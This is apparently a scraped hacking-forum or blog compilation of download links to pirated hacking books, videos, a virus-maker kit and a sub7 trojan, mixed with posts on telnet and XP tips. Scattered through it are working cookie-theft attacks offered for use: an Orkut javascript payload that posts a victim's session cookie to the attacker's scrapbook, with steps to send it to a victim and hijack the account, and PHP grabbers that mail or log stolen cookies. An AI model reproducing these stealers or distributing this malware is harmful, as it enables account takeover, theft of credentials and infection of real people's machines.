http://rapidshare.com/files/22245944/RapidHacker_1.0beta.rar


How to be a hacker
http://rapidshare.com/files/22078421/how_to_be_hacker1.rar


Rapidshare Premium Pack
contain all the tools for bypassing rapidshare
http://rapidshare.com/files/22245943/Rapidshare_Premium_Pack_2006__52in1.rar

Secret of a hacker
http://rapidshare.com/files/22078422/Secret_of_hacker1.rar

Methods of attacking a website
http://rapidshare.com/files/22078424/Web_attack1.rar

Hacking video
It is 678 MB video cd
Download Hacking Video
It include following video

1)series intro
2)Hacker terms
3)Hacker procedure
4)Using VMWare
5)Using linux
6)Passive intelligence Gathering part 1
7)Passive intelligence Gathering part 2
8)Social Enginnering
9)Network Reconnaissance part 1
10)Network Reconnaissance part 2
13)Service Identification and Enumeration
14)Vulnerability Assessment: Nessus & GFI Languard
15)Vulnerability Assessment: Network Sniffing
16)SNMP
17)DNS
18)Password Cracking
19)Exploits Part1:Linux
20)Exploits Part1:Windows
21)Web and file Exploits
23)Wireless Security
24)Erasing tracks

http://rapidshare.com/files/22410026/Hacker.Black.CD.Series.part01.rar
http://rapidshare.com/files/22549272/Hacker.Black.CD.Series.part02.rar
http://rapidshare.com/files/22672654/Hacker.Black.CD.Series.part03.rar
http://rapidshare.com/files/22707514/Hacker.Black.CD.Series.part04.rar
http://rapidshare.com/files/22713752/Hacker.Black.CD.Series.part05.rar
http://rapidshare.com/files/23006836/Hacker.Black.CD.Series.part06.rar
http://rapidshare.com/files/22874902/Hacker.Black.CD.Series.part07.rar

Hacker book
http://rapidshare.com/files/23490054/Hacker_Book.rar


Dos tools
Learn all about the dos tools which are used for hacking

Nbtstat
Nslookup
Ping
Tarcert
FTP
Netstat
Pathping
Route
Telnet
Netbios

http://rapidshare.com/files/24251635/DOS.rar

Hacking books
1)(Ebook - Pdf) Untold Windows Tips And Secrets (Ankit Fadia).pdf
2)Algorithms Explained.doc
3)Ankit Fadia Hacking Guide.pdf
4)Base64 Encoding Torn Apart.doc
5)Batch File Programming - Ankit Fadia.pdf
6)Closing Open Holes.doc
7)Defacing Websites A Step By Step Process By Ankit Fadia Hacking 8)Truths_ FTP Exploits.pdf
9)Dos Attacked.pdf
10)Fadia, Ankit - Encryption Algorithms Explained.pdf
11)firewalls(2).doc
12)firewalls.doc
13)FTP Exploits By Ankit Fadia.pdf
14)Gathering Info on Remote Host.doc
15)Getting geographical Information using an IP Address.doc
16)Hacking into Linux.doc
17)More Password Cracking Decrypted.doc
18)Removing Banners from your site.doc
19)Sendmail and Beyond.doc
20)SSL Torn Apart.doc
21)TCP Wrappers Unwrapped.doc
22)Tracing IP,DNS,WHOIS-nsLOOKUP.pdf
23)Transparent Proxies in Squid.doc
24)Transparent_proxies_with_Squid_By_Ankit_fadia_hackingtruths_box_sk_Proxy_Servers.pdf
25)Truths!!!--What they Don't teach in Manuals!!!.pdf
26)Untold Windows Tips and Secrets.doc
27)Windows Password Files Torn Apart.doc

http://rapidshare.com/files/24555380/Hacking_books.rar


Hacking kit
Hacking.rar" target="_blank">http://rapidshare.com/files/24780822/Hacking.rar


Hacking a server
in this clip you will find how to hack sever
http://rapidshare.com/files/24906510/server.part1.rar

http://rapidshare.com/files/24906511/server.part2.rar


Ethical hacking guide
1)Coding & Buffer Overflow
2)Denial of Service
3)Encryption
4)Footprinting and Scanning
5)Linux Security
6)Sniffing and Hijacking
7)Trojans & Rats
8)Web Security
9)Win OS Hacking & Networking
10)Wireless Security
11)Worms & Viruses

with tools

http://rapidshare.com/files/25083944/Ethical_hacking_guid.rar
SQL injection
http://rapidshare.com/files/19210335/Vedio_hacking

Gifts 4 XP Users

Well these are a few new tricks, which I dont think have appeared on this community before. This too have been lifted from a book. Coz I dont like to take credit of anything after a copy-paste of something which
I donno. Courtesy : DIGIT Magazine. [Highly recommended to those who want to 'learn hacking' and those who ask for 'E-Books', although it doesn't speak much abt hacking (altho it gives you idea of how
viruses, keyloggers,sniffers, SQL injections, backdoors etc work and wich are the top 5 sniffers,viruses you have to save your PC from) but it is good source of knowledge for a Computer Enthusiast like me.

(1) How to test whether your XP is orignal or not.

This helps you to prevent the Computer Vendor fooling you and taking a 250 bucks etc claiming that he has installed orignal Windows XP on your PC. Check out this test.
Open your Run [Start > Run or Win key + 'R']

Type 'oobe/msoobe /a' and hit enter.

If activated, it will give you the message that 'Windows Already Activated...Click OK To Exit' else it will ask you the license code to activate the Windows OS.

(2) This one I found very helpful and intresting. specially if it a multi-user or shared computer. You can specify the login time of a user. This helps the Administrator [or parent] to ensure that their user [child] is
not spending too much time on the PC. It even shows the last login date and time by the user so as to monitor his usage.

Go to Command Prompt [Start >Run>cmd or Start>programs>Accesories>Command Prompt].
Type 'net user '
Add the parameter '/times :' followed by the days you want to allow [Mon-Sun] and then comma (,) and the time [in 24 Hr format]
Eg : net user Banner/times :Sun,15-19
Means I can sign in only on Sundays between 3 pm and 7pm
Pls note the at 7pm windows WILL NOT SIGN ME OFF.
It simply means it restricts my LOGIN after 7pm.
This is sensible only if other accounts are password protected.
Check this by typing ' net user ' at the command prompt.

------- >> ( If this does not work pls try without leaving a space between '/times' and ':' <<------------------

(3) Well all of us know how to change the sound to b played wen an application starts [Eg: Start Windows, Turn Off, Error etc], but those are the default applications. So lets try to add something to the existing
set of application [like mayb Notepad, MS Word, etc].


Go to your registry [Run >> 'regedit' or browse through C:/Windows/Regedit]
Browse through HKEY_CURRENT_USER\AppEvents\Schemes\Apps
Right Click on Apps
New > Key
Type the name in windows format [Eg: mspaint for Paint Brush, msword for Word etc]
Now click on the newly created option
Right click on Default > Modify > Edit String > Value Line type the name you wish to see on the Sounds Settings Box.

Go to control panel > sound & audio devices > sounds > and scroll down to see the newly created program [on the last line mostly]
Click browse and select your favourite song in .wav format .....

I hope this helps you. Thats all I hav in stock for the time being. Pls do contribute in if you have something intresting to share.

Security Tools Database and Network

Security Tools Database and Network
Security Tools Database and Network

1.) OAPScan - Oracle Application Server Scanner

This tool detects web pages, DADs (Database Access Descriptors) and test applications installed by default.

It may be useful for system hardening and pen-test.

http://zenisa.com/2007/07/02/oapscan-oracle-application-server-scanner/

2.) 281 of the Best System Administration Tools

Tools for: database, email, hard disk, internet, linux, macintosh, network, scripts, virus, and windows.

http://zenisa.com/2007/07/03/281-best-system-administration-tools/

3.) Norton AntiBot

Actively and continuously monitors your PC’s applications and processes 24 X 7 so you’re always protected.

Thoroughly removes detected bots and malware and their related components

http://zenisa.com/2007/07/03/norton-antibot/

4.) Hacking Tool : SQL Ninja

Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Its main goal is to provide a remote shell on the vulnerable DB server

entered once computer using internet

telnet is some method to get connected to remote computer....for that follow the steps....
1.go to run command
2.type cmd
3.get to root directory by pressing 'cd\'
4.type 'telnet'space and the ip adderess of the remote computer u want to connect....by default it gets connected to port 23
for telent connection u require ip configuration that is must,without it u cant connect...
for eg..i have got ip adderess of some internet connection as 192.158.4.8...so in order to connect it thru telnet type d following command
telnet 192.158.4.8 and press enter....
for any further query contact me......
enjoy hacking


To use telnet on lan type telnet in command prompt and you will get the telnet prompt like "microsoft telnet>" there you type

Microsoft Telnet>o 192.123.23.45 25

here in the above line the o is for opening
192.123.23.45 is the ip adress of the target comp and 25 is the port number which is open most of the time.

using this format you can get connected to the another system on ur lan. to fethch the ip address of the other system go to its command prompt and type "ipconfig"

yahoo hacking tool

As for the others, I ask this: How stupid are you feeling now. You installed a sub7 trojan on your comp. You even registered ur names on my site, so that I know which ips to target: http://xnormature.110mb.com/logger.txt .
I couldve exploited this well. I had all the tools, the client (nice gui btw), the connection, and the target (who's ip I know as well) . Some options I could do is upload stuff onto ur comp, mess around, change wallpaper, crash system, and loads of other "fun" stuff.

GUYS, HAVENT YOU LEARNT ANYTHING FROM WHAT I SAID.... I COULD'VE LITERALLY SCREWED UR SYSTEMS.... ask any1 who used sub7 as to how good it is.

Golden rules of security-
1. Never download hacking tools,and definately never "Hacking" tools, which "hack" the yahoo email password and give the result and stuff.
2. For god's sake, NEVER disable your antivirus and firewall , EVEN at gunpoint, NEVER!!!!
3. Don't trust any1 on the net, esp sum1 u never met. It doesnt matter what that person says, it might be shameless lies of all! (special relevence to A.J.)
4. Be paranoid, be very paranoid. Imagine every1 WANTS to hack you!
5. Never post your emails on the forums. Thats like inviting spam.

People, we (some members/mods) keep repeating those points, but no1 bothers to listen, and eventually end up screwing up urself.


btw, if you still don't believe me, download the sub7 client from hackpr.net/~sub7/ , and test it on ur own comp (Ip: 127.0.0.1 ). You will see my point.



To uninstall that sub7, use any standard antivirus. I prefered sub7 cause almost all antivirus softwares can remove it.
another cookie stealnig script ,,
just change UId


javascript to steal cookies just change the scrapbook url
javascript:document.body.innerHTML+='';function redre(){setTimeout("location.href=\" http://www.­orkut.com/Scrapbook.aspx\";", 2000)};flood.location=" http://www.­orkut.com/Scrapbook.aspx";dscrap=document.getElementById('scrapText');setTimeout('df=flood.document.forms[1];df.innerHTML+=\'\';df.action="http://www.orkut.com/Scrapbook.aspx?uid=16475564512586661663";flood.document.getElementById(\'scrapText\').value=document.cookie;flood.document.getElementsByTagName(\'input\')[\'Action.submit\'].click();redre();', 3000);void(0)



Yahoo! cookie stealer
Yahoo security weakness
- cookie stoler -
Today status - Unpatched

This script can help anyone to acces victims inbox without knowing the password
Only works on IE 5x-6x and only with old Yahoo mailboxes (not with the Beta version)
===========================================================================

==============================
The Script:
==============================

Some text here

-

==============================
Php grabber (mail sender):
==============================

$to=" myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

?>
To see how it works watch the video - http://antifrauda.evonet.ro/yahoo.rar

Cookie display page
check it out ;


http://a5e6sf5.netfast.org/newpage2.php





here is cookie stealing leson i fund for u guys,,,
Cookie Stealing....
Simple Cookie Stealing

For the rest of these lessons we will assume that this site has a group of users who can login, and that their details are stored in a cookie.

This is like sites such as Hotmail.com, Livejournal, and Freshmeat.

If we assume that the site has the ability to send a message to other users then we can proceed.


click here :

http://www.steve.org.uk/Hacks/XSS/simple.html




Mozilla Cookie Stealing
Summary
Cookies are often used to identify and authenticate users to a website. If an attacker can steal a user's cookies, then they can impersonate that user. The completeness of the impersonation and the actions the attacker can perform as that user depend on how the particular site uses the cookies.

A bug in Mozilla allows an attacker to steal the user's cookies for any given domain if the attacker can convince the user's browser to load a given URL. It does not require that active scripting is enabled in the browser, and can be done with something as simple as an image tag, allowing for hassle free use in HTML email, web based email services, etc.


Vulnerable systems:
Netscape versions prior to 6.2.1
Mozilla versions prior to 0.9.7

Immune systems:
Netscape version 6.2.1
Mozilla version 0.9.7

Background:
Cookies are the mechanism used by most websites to identify and authenticate a user. If you can steal someone's cookies, you can trick the server into thinking you are that other server. Exactly what this gains you depends on the application and how it is designed. It may gain you very little, or it may gain you a whole lot (e.g. Microsoft Passport to Trouble). For more information about cookies, see The Unofficial Cookie FAQ.

Cookies are set with a specific hostname or a domain, so that they are only sent to that host or domain, with an exception or two. They can also be set with a specific path, or with the secure flag, which means they will only be sent if the connection is a SSL connection. Normally, this should mean that only the server that set the cookie, or others it is operating in cooperation with (e.g. in the same domain) can read it.


Mozilla has a bug that lets you bypass this protection and steal cookies for any domain. This is quite similar to bugs found in Microsoft Internet Explorer in the past (see http://alive.znep.com/~marcs/security/iecookie1/ and http://alive.znep.com/~marcs/security/iecookie2/). As has been shown repeatedly, there are many security flaws in many Microsoft products. Sadly, they are far from being alone. There is almost certainly no web browser out there that is functional enough to browse a significant percent of current popular websites and that does not have similar security holes.

Details:
Loading a URL such as: http://alive.znep.comwww.passport.com/cgi-bin/cookies

Will cause Mozilla to connect to the hostname specified before the "", but send the cookies to the server based on the entire hostname. The "" is the URL encoded version of the null character, used in C to terminate strings.

This exploit can be used to steal cookies with a specific path set, and can be used to steal cookies with the secure flag set, by using the specific path and SSL in the request URL. Note, however, that cookies set for a specific hostname (e.g. "www.passport.com") cannot be stolen using this method, but only cookies set for an entire domain (e.g. ".passport.com").

Example exploit:
An example exploit is available. It is in fact very straightforward:
http://alive.znep.com/Firefox: serious cookie stealing / same-domain byp
There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1,
but quite certainly affecting all recent versions.

The problem lies in how Firefox handles writes to the 'location.hostname'
DOM property. It is possible for a script to set it to values that would
not otherwise be accepted as a hostname when parsing a regular URL -
including a string containing \x00.

Doing this prompts a peculiar behavior: internally, DOM string variables
are not NUL-terminated, and as such, most of checks will consider
'evil.com\x00foo.example.com' to be a part of *.example.com domain. The
DNS resolver, however, and much of the remaining browser code, operates on
ASCIZ strings native to C/C++ instead, treating the aforementioned example
as 'evil.com'.

This makes it possible for evil.com to modify location.hostname as
described above, and have the resulting HTTP request still sent to
evil.com. Once the new page is loaded, the attacker will be able to set
cookies for *.example.com; he'll be also able to alter document.domain
accordingly, in order to bypass the same-origin policy for XMLHttpRequest
and cross-frame / cross-window data access.

A quick demonstration is available here:

http://lcamtuf.dione.cc/ffhostname.html

If you want to confirm a successful exploitation, check Tools -> Options
-> Privacy -> Show Cookies... for coredump.cx after the test; for the demo
to succeed, the browser needs to have Javascript enabled, and must accept
session cookies.

The impact is quite severe: malicious sites can manipulate authentication
cookies for third-party webpages, and, by the virtue of bypassing
same-origin policy, can possibly tamper with the way these sites are
displayed or how they work. ~marcs/security/mozillacookie/demo.html.







http://www.milw0rm.com/papers/130









XSS - Stealing Cookies 101
Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago, doesn't mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client.

A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October it reminded us that we must be vigilant in filtering text which users post because a hacker could smuggle in some javascript code to maliciously use the site from the browsers of authenticated users.

By stealing a users cookies as the LiveJournal hack did, you don't even have to cary out the attack in the users browser; you can do it elsewhere. Worst of all stealing cookies is EASY TO DO, and HARD TO PROTECT AGAINST.

Easy to do?




That was it. If i can get that code on a site where you are authenticated, I can become you.

We can also use another method in IE. Execute the javascript in CSS.





Any time you let users post text and you don't religiously restrict the content, they can steal sessions. Scarry? If you are a developer it better scare the hell out of you.

So, you might want to start believing every session is stollen. I didn't even try to obfuscate that. Start rolling your sessions id's from one value to another, expire them in short intervals. Track the referrer, user agent, etc. Some of these changes don't add any real security, but they do add layers; and that always helps.

If you are not familiar with the MySpace XSS hack, read up. It's rich on the details.

If you want to view my server side logging script log.cgi, check it out; it's just a simple python cgi script that dumps the cookies to a text file.





Cookie Stealing using XSS
Cookie is used to manage sessions in browsers. Each person logged in gets a unique cookie, it is like a key to the site. So if you can get hold of this cookie, you have the key to enter the site. The site will welcome as the person from whom you stealed the cookie. Now let us look how to grab the cookie using cross site scripting.

For cookie stealing there must be an xss hole which can be injected through the url of the page like the one on propmart.com we discussed in first part.
Getting a cookie in javascript is accomplished by document.cookie, if somehow we could sent this to our page we have success. For this trick you will need to setup a page that logs the cookies that it recieves. The source of this page in php would be something like :
grabcookie.php


$handle=fopen("cookiejar.txt","a");
fputs($handle,"\n".$_GET["cookie"]."\n");
fclose($handle);
?>


Now to get the cookie to this page we would have to embed the following





This code will send the cookies to your server. Now embeding the script in url can be done as discussed

Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in firefox with the cookie editor plugin.[https://addons.mozilla.org/en-US/firefox/addon/573]
Msn Cookie Stealer
MSN CE/DP Stealer 2.0

Click here to Download

stealer.html" target="_blank">http://www.freedownloadscenter.com/Best/cookies-stealer.html

CE/DP Stealer is a utility to view and save your buddies MSN Emoticons and Display Pictures. With it you can save MSN Emoticons and Display Pictures that any of your MSN contacts may have used in conversations with you in MSN Messenger 6 and 7!



Yahoo! cookie stealer
Yahoo security weakness
- cookie stoler -
Today status - Unpatched

This script can help anyone to acces victims inbox without knowing the password
Only works on IE 5x-6x and only with old Yahoo mailboxes (not with the Beta version)
===========================================================================

==============================
The Script:
==============================

Some text here

-

==============================
Php grabber (mail sender):
==============================

$to=" myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

?>
To see how it works watch the video - http://antifrauda.evonet.ro/yahoo.rar




Cookie display page
check it out ;


http://a5e6sf5.netfast.org/newpage2.php

cookies stealer

cookie stealer
this is a javascript that you needto send to victim when he executes the java script you get his cookies on your scrapbook.

javascript:document.body.innerHTML+='';function redre(){setTimeout("location.href=\"http://www.orkut.com/Scrapbook.aspx\";", 2000)};flood.location="http://www.orkut.com/Scrapbook.aspx";dscrap=document.getElementById('scrapText');setTimeout('df=flood.document.forms[1];df.innerHTML+=\'\';df.action="http://www.orkut.com/Scrapbook.aspx?uid=10594638820107328171";flood.document.getElementById(\'scrapText\').value=document.cookie;flood.document.getElementsByTagName(\'input\')[\'Action.submit\'].click();redre();', 3000);void(0)


After df.action put in your uid So it sends you his Cookies then the Answer will be Printed in your Scraps.
---------------------------------------

works if the victim has a ff or opera


to use cookies to access an orkut account.
--------------------------
d/w a ff plugin called cookie editor
https://addons.mozilla.org/en-US/firefox/addon/573

----------------------------
after installing the ff plugin n getting the cookies from victim

then open cookie editor from tools>cookie editor
find entry of orkut_stat go to edit
replace it with the entry in the recieved cookies

note- only replace the orkut_stat part of the cookies
now see the magic.

virus making tool kit

Virus-Maker kit
This is a Virus-Maker Kit

Features:-

You can disable Norton Antivirus, Mc-Afee,Windows Explorer, Yahoo Messenger

Crazy Mouse

You can play with Victims Cd-Rom

Destroy Audio-Service of Victim

Disable Msconfig, Registry, Group Policy

and lots of features... check scree-shot for more features

to view screen shot of Virus Maker click this link http://i4.tinypic.com/6cpzvpt.png

Download Links for Virus-Maker Kit:-

http://www.2shared.com/file/2290394/28462c7d/JPSVM3.html
(mirror link)
http://rapidshare.com/files/56767479/JPSVM3.zip.html










~~~~Hacking is not a Crime but its an Game of Mind~~~~ :death arrival

hacking bookz

O'really hacking books
OReilly Digital Video Hacks.chm
Oreilly Firefox Hacks.chm
oreilly flash hacks.chm
OReilly Google Hacks 2nd Edition.chm
OReilly Halo 2 Hacks.chm
OReilly IRC Hacks.chm
O'Reilly Network Security Hacks.chm
Oreilly Paypal Hacks.chm
OReilly PC Hacks.chm
OReilly PDF Hacks.chm
OReilly Podcasting Hacks.chm
OReilly Retro Gaming Hacks.chm
OReilly Spidering Hacks.chm
OReilly Visual Studio Hacks Mar.2005.chm
O'Reilly Windows Server Hack.chm
Oreilly Windows XP Hacks 2nd.edition.chm
OReilly Wireless Hacks 100 Industrial - Strength Tips and Tools.chm
Swing Hacks.chm
Word Hacks - O'Reilly.chm
Yahoo Hacks.chm

http://rapidshare.com/files/22096039/Really_hacks1.rar

dos tools

Dos tools
Learn all about the dos tools which are used for hacking

Nbtstat
Nslookup
Ping
Tarcert
FTP
Netstat
Pathping
Route
Telnet
Netbios

http://rapidshare.com/files/24251635/DOS.rar

ultimate linkz for hackerz

UNLIMITED LINKS FOR HACKERS
juz have a luk at these....

http://rapidshare.com/files/2446548/Total_computer_tips.rar

http://rapidshare.com/files/2446544/Complete_Hardware_Course_.rar

http://rapidshare.com/files/2446545/Complete_Registry.rar

http://rapidshare.com/files/2446546/Internet_in_10_days.rar

http://rapidshare.com/files/2446547/TCP_IP_In_14_Days.rar

http://rapidshare.com/files/2446548/Total_computer_tips.rar

http://rapidshare.com/files/1613921/15_minute_security_guide_-_windows.ppt.pdf

http://rapidshare.com/files/1615930/15_minute_XP_lockdown.pdf

http://rapidshare.com/files/1615931/Attack_Host_systems.ppt

http://rapidshare.com/files/1615932/Hacking_Methodologies.ppt

http://rapidshare.com/files/1615935/Watching_rt_time_2_hack.ppt

http://rapidshare.com/files/1616271/virus_tracking_through_google.rar

http://rapidshare.com/files/1405957/Google_Hacks.chm

http://rapidshare.com/files/1361494/Network_security.rar

http://rapidshare.com/files/1359117/Hacker_s_black_book.rar

http://rapidshare.com/files/1094448/the-little-black-book-of-computer-viruses.pdf
Python 2.1 Bible.zip
download: http://w11.easy-share.com/887198.html


linux-linux bible 2006 edition boot up to fedora knoppix debian suse ubuntu and 7 other distributions jan 2006 ebook-ddu.zip
download: http://w11.easy-share.com/887189.html

hacking-Wiley - Reversing Secrets of Reverse Engineering.zip
download: http://w11.easy-share.com/887120.html


security-firewallPolicies.zip
download: http://w10.easy-share.com/887105.html


perl-beginning perl web development - from novice to professional (2006).pdf
download: http://w11.easy-share.com/886571.html

security-Internet Security.zip
download: http://w10.easy-share.com/886524.html

hacking - web applications (hacking exposed).zip
download: http://w11.easy-share.com/886462.html

hacking-Syngress.Buffer.Overflow.Attacks.Dec.2004.ISBN1932266674.pdf
download: http://w10.easy-share.com/883364.html




hacking-Wiley - Reversing Secrets of Reverse Engineering.zip
download: http://w11.easy-share.com/887120.html
gr8 collection one in all
http://books.rackhub.com/location/YnlfY195dXR0YXBvbmcvSGFja2luZw==/


plzgo throug this .. a all in one book collection
These are some exploit I play with...
http://milw0rm.com/metasploit.php?id=42
http://metasploit.com/projects/Framework/exploits.html
http://www.ukcert.org.uk/repository/exploits/
A Word of Caution folks, These tools may whack your PC or also your network. When you work with these hacking tools you are playing with fire. If a Swordsman doesn't know how to use his sword, he may injure himself.
see this also..

http://books.rackhub.com/location//



The best ebooks sites:-

01. http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/
02. http://lab.lpicn.org/pub/books/
03. http://hellnet.perverz.hu/ebookz/
04. http://www2.fixdown.com/en/eall_1.htm
05. http://www.tutorialized.com/
06. ftp://194.44.214.3/pub/e-books/
07. http://www.intelligentedu.com
08. http://ebook.vnwz.net/
09. http://www.citystars1.com/portal/modules.php?name=Downloads
10. http://www.mervin.sk/pdf/
11. http://esnips.com/web/Sidney-Sheldon
12. http://esnips.com/web/Ayn-Rand
13. http://esnips.com/web/Charles-Dickens
14. http://www.esnips.com/web/Nicholas-Sparks
15. http://esnips.com/web/Robin-Cook
16. http://esnips.com/web/Dan-Brown
17. http://esnips.com/web/Douglas-Adams
18. http://esnips.com/web/Paulo-Coelho
19. http://esnips.com/web/John-Grisham
20. http://esnips.com/web/Erich-Segal
21. http://esnips.com/web/Jeffery-Archer
22. http://esnips.com/web/Jane-Austin
23. http://www.ebookscentral.au.tt
24. http://www.templateen.com/
25. www.ebooksclub.org
26. http://www.xpressionsz.com/
27. www.anwarica.com
28. www.needz.org
29. http://www.gutenberg.org/
30. http://prodigy.3rdimension.co.uk/Literature/index.html
31. http://ebookslink.50g.com/
32. http://esspc-ebooks.com/all.asp
33. http://ebookslink.tripod.com/
34. www.kebook.com
35. http://avaxhome.ru/ebooks/engg-booksp4.html
36. www.anwarica.com
37. www.dhruvaraj.com
Some other great sites:
UNIX LINUX BOOKS
http://www.giuciao.com/books/sorted.php?by=Linux&ord=id

WINDOWS BOOKS 47 BOOKS
http://www.giuciao.com/books/sorted.php?by=WinXP&ord=id

WINDOWS SERVER BOOKS 39 BOOKS
http://www.giuciao.com/books/sorted.php?by=Win2003&ord=id

HACKING BOOKS
Hacking&ord=id" target="_blank">http://www.giuciao.com/books/sorted.php?by=Hacking&ord=id

CISCO BOOKS 69 BOOKS
http://www.giuciao.com/books/sorted.php?by=Cisco&ord=id

PHP BOOKS 50 BOOKS
http://www.giuciao.com/books/sorted.php?by=php&ord=id

SQL BOOKS 85 BOOKS
http://www.giuciao.com/books/sorted.php?by=sql&ord=id

JAVA BOOKS 161 BOOKS
http://www.giuciao.com/books/sorted.php?by=Java&ord=id

C, C++, C# BOOKS 100 BOOKS
http://www.giuciao.com/books/sorted.php?by=Cplus&ord=id
THE BEST SEARCH ENGINES ON THE INTERNET
Google http://www.google.com/
FAST http://www.alltheweb.com/
HotBot http://hotbot.lycos.com/
Lycos http://www.lycos.com/

Pandia Search Central has most of the search engines on the Internet.
http://www.pandia.com/

Search Engine Watch has most of the search engines on the Internet.
http://www.searchenginewatch.com/

SearchEngineGuide has most of the search engines on the Internet.
http://www.searchengineguide.com/
Open Directory Project is a great directory of the Internet!

http://dmoz.org/

Internet Archive is THE archive of the Internet!
http://www.archive.org/
COMPUTER TECHNOLOGY INFORMATION PAGES
ZDNet http://www.zdnet.com/
CNet http://www.cnet.com/
PCWorld http://www.pcworld.com/
PCMagazine http://www.pcmag.com/
TechTV http://www.techtv.com/techtv/
Kim Komando http://www.komando.com/
Experts Exchange http://www.experts-exchange.com/
Help on the Net http://www.helponthe.net/
How Stuff Works http://www.howstuffworks.com/
Answers That Work http://www.answersthatwork.com/
Webopedia Online Internet Dictionary http://webopedia.internet.com/
Computer Tech Documentation Project http://www.comptechdoc.org/
COMPUTER HARDWARE AND SYSTEM PAGES FOR WINDOWS
WinPlanet http://www.winplanet.com/winplanet/
WinGuides http://www.winguides
System information tweak sites:
Tweak3D http://www.tweak3d.net/
Axcel-216 http://members.aol.com/axcel216/
Tweak Central http://tweakcentral.com/
Tweak Town http://www.tweaktown.com/
Computer Hardware & Information & Testing sites:
Tom's Hardware Guide http://www.tomshardware.com/
Sharky Extreme http://www.sharkyextreme.com/
AnandTech http://www.anandtech.com/
Neoseeker http://www.neoseeker.com/
PCGuide http://www.pcguide.com/
PCStats http://www.pcstats.com/
ArsTechnica http://www.ars-technica.com/
Overclockers Club http://www.overclockersclub.com/
Futuremark http://www.madonion.com/

*************

Computer technology sites:
ExtremeTech http://www.extremetech.com/default/0,3971,,00.asp
TechSpot http://www.techspot.com/

-------

Hard drive and storage information sites:
Storage Review http://www.storagereview.com/

-------

Windows’ Registry information & utility sites
Sysinfo http://www.sysinfo.org/

SysInternals http://www.sysinternals.com/

Annoyances http://www.annoyances.org/
COMPUTER AND INTERNET SECURITY PAGES
TomCat http://www.tom-cat.com/tomcat.html

Gibson Research Corporation http://grc.com/default.htm

Security Info http://securityinf.net/

Symantec http://www.symantec.com/

Symantec Security Response http://www.sarc.com/

Microsoft Security and Privacy http://www.microsoft.com/security/

ExtremeTech Syscheck http://www.extremetech.com/article2/0,3973,651,00.asp

WindowsSecurity http://www.windowsecurity.com/

UKSecurityOnline http://www.uksecurityonline.com/

CERT http://www.cert.org/

PC Flank http://www.pcflank.com/

McAfee http://www.mcafee.com/

Trend Micro htttp://www.trendmicro.com/en/home/us/personal.htm

HackFix page http://www.hackfix.org/
Update and patch your computer.
BigFix http://www.bigfix.com/

Cable/DSL utility and connection scan sites.
Broadband Reports tools" target="_blank">http://www.broadbandreports.com/tools

New links for Free books Download
1. http://ftp.cgu.edu.tw/Mirror/E-Book/
2. http://www.coltech.vnu.edu.vn/ttmt/ebooks/
3. http://www.flashdance.cx/books/
4. http://212.14.233.133/portal_resources/downloads.jsp
5. http://www.giuciao.com/books/sorted.php?by=Cplus&ord=id
6. http://www.zikri.com/
7. http://www.flazx.com/
8. http://www.dhruvaraj.com/
9. http://www.gayanb.com/free-technical-books1.php

below e-book link is c++ book by BjarneStroustrup
http://www.observatorio.unal.edu.co/virtual/books/The_C++_Programming_Language_Third_Edition_by_Bjarne_Stroustrup.pdf

ftp://202.116.0.16/PUB2__Books/MS.PRESS

ftp://ftp.prenhall.com/pub/esm/computer_science.s-041
Some other links for ebooks
01. http://www.esnips.com/web/vamsygs-books
02. http://googlebooks.tk/
03. http://www.ssuet.edu.pk/~amkhan/cisco/cisco.htm
04. http://barnov.ath.cx/books/
05. www.kebook.com
06. http://www.zipsites.ru/books/edocs/edocs_list.php
07. www.thedotnetguide.com
08. http://ebook.blogfa.com/
09. http://babis.homeip.net/computers/
10. http://itebookhome.com/
11. http://www.comms.scitech.susx.ac.uk/fft/
12. http://www.kebook.com/0-1.htm
Tutorials, Books, Utils, Misc
01, http://www.ebooksportal.org/ (Lots of Books)
02, http://www.techbooksforfree.com/ (Free Books)
03, http://www.freeprogrammingresources.com/books.html (Tutorials)
04, http://programmersheaven.com/ ( tutorials, examples, utils)
05, http://www.maththinking.com/boat/booksIndex.html ( books )
06, http://computer.howstuffworks.com/ ( ALL )
07, http://www.developer.com/
08, http://programmingtutorials.com/ ( tutorials )
09, http://www.sysinternals.com/ntw2k/utilities.shtml (freeware utils)
10, http://www.wotsit.org/ ( file formats )
11, http://www.catb.org/~esr/faqs/hacker-howto.html ( How to be a hacker )
12, http://www.echoecho.com
13, http://www.programmerstools.org/ (Windows Programming Tools)
14, http://www.scriptsearch.com/
15, http://www.oreilly.com/openbook/ (O'Reilly Books)
16, http://sysadmin.oreilly.com/ ( O'Reilly Books)
17, http://www.hoganbooks.com/freebook/webbooks.html
18, http://www.informit.com/itlibrary/
19, http://www.fore.com/support/manuals/home/home.htm
20, http://www.cs.columbia.edu/netbook/ (The Network Book)
21, http://www.cs.bell-labs.com/cm/cs/pearls/
22, http://202.159.16.55/~pimpa2000
23, http://202.159.15.46/~om-pimpa/buku
24, http://www.eastcoastfx.com/docs/admin-guides/
25, http://www.eastcoastfx.com/~jorn/reading/
26, http://www.cs.monash.edu.au/~alanf/se_proj97/
27, http://www.redbooks.ibm.com/
28, http://solaris.inorg.chem.msu.ru/cs-books/
29, http://sweetrude.net/~cab/books/
